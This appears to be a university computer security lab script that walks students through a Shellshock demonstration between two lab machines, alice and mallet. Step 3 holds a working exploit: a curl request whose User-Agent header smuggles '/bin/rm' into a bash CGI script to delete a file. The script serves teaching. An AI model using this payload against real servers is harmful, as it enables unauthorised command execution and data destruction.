######################
# Shellshock example
# @author Kami Vaniea
#
# The following are a set of commands developed for the
# Computer Security course at University of Edinburgh.
# 
# Comments start with a # symbol
# Commands that should be typed into alice's terminal start with:
# alice> 
# Commands that should be typed into mallet's terminal start with:
# mallet>  
######################

##
# Step 1: Create a hello world CGI file entitled myprog.cgi using the following commands
##

alice> echo '#!/bin/bash' > /usr/lib/cgi-bin/myprog.cgi
alice> echo 'echo "Content-type: text/plain"' >> /usr/lib/cgi-bin/myprog.cgi
alice> echo 'echo ' >> /usr/lib/cgi-bin/myprog.cgi
alice> echo 'echo "Hello World"' >> /usr/lib/cgi-bin/myprog.cgi

# Visit the new page using Firefox on Alice
# http://alice/cgi-bin/myprog.cgi
# You should see the words "Hello World"

## 
# Step 2: Setup a victim file on Alice
##

alice> cd /var/www/
alice> echo 'Test file' > test.txt
alice> ls
# The ls should show multiple files including test.txt

## 
# Step 3: Mallet uses Shellshock to delete the test.txt file on alice 
##

# Make sure that mallet can read the page
mallet> curl http://alice/cgi-bin/myprog.cgi 
# Should result in "Hello World"
mallet> curl -A "() { :; }; /bin/rm /var/www/test.txt" http://alice/cgi-bin/myprog.cgi
# Results in an error 

## 
# Step 4: Alice's file is gone!
## 

alice> ls /var/www/
# test.txt should no longer appear